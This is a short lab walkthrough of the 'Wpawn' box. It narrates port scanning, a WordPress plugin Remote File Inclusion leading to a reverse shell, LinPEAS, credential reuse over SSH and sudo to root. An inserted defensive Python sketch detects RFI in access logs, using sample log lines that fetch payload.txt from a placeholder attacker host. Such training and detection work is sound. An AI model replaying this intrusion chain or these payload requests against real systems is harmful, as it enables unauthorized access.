🐧Wpawn

192.168.84.123

Enumeration

sudo nmap 192.168.84.123 -sV -A -p-

Port 22

Banner grab

Port 80

Running dirbuster to enumerate the website.

Found an interesting plugin being used.

There are known vulnerabilities for this plugin. https://wpscan.com/vulnerability/7b412469-cc03-4899-b397-38580ced5618

Was able to get a reverse shell using the following.

Creating text file payload.txt and pulling it with Remote File Inclusion.
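
On the defending side, a Remote File Inclusion request like the one above shows up in the web server's access log as a plugin URL whose query parameter carries a remote URL. The following detection sketch is an added example, not part of the original write-up; the log lines, plugin path, parameter names, addresses and the `own_hosts` allowlist are constructed placeholders.

```python
from urllib.parse import urlsplit, parse_qsl
import re

# Constructed access-log lines (combined format). Plugin path, parameter
# names and addresses are placeholders, not values from the write-up.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /wp-content/plugins/example-plugin/view.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Jan/2024:10:00:07 +0000] "GET /wp-content/plugins/example-plugin/view.php?url=http%3A%2F%2F203.0.113.9%2Fpayload.txt HTTP/1.1" 200 0 "-" "curl/8.0"
198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /wp-content/plugins/example-plugin/view.php?img=https%3A%2F%2Fblog.example.test%2Flogo.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Jan/2024:10:00:12 +0000] "POST /wp-content/plugins/example-plugin/ajax.php?src=//203.0.113.9/payload.txt HTTP/1.1" 200 0 "-" "curl/8.0"
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
REMOTE_SCHEMES = {"", "http", "https", "ftp"}  # "" covers scheme-relative //host/path


def remote_host(value):
    """Return the hostname if a parameter value is a remote URL, else None."""
    try:
        url = urlsplit(value.strip())
    except ValueError:  # malformed netloc, e.g. broken IPv6 brackets
        return None
    if url.hostname and url.scheme.lower() in REMOTE_SCHEMES:
        return url.hostname
    return None


def find_rfi_candidates(log_text, own_hosts=("blog.example.test",)):
    """Flag plugin requests whose query string points at a foreign host."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, method, target, status = m.groups()
        parts = urlsplit(target)
        if "/wp-content/plugins/" not in parts.path:
            continue
        # parse_qsl percent-decodes once, so http%3A%2F%2F... is caught too
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            host = remote_host(value)
            if host and host not in own_hosts:
                hits.append({"client": client, "method": method, "path": parts.path,
                             "param": name, "host": host, "status": int(status)})
    return hits


if __name__ == "__main__":
    for hit in find_rfi_candidates(SAMPLE_LOG):
        print(hit)
```

A hit where the client address and the included host are the same, followed by an outbound connection from the web server to that host, is a strong lead for triage.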

Shell

Got a shell.

Found no interesting files. There is another user named takis. Dropped LinPEAS in /tmp.

Found credentials.

The found password works for takis' account; connected via SSH.

Running sudo -l

Root

Ran sudo su
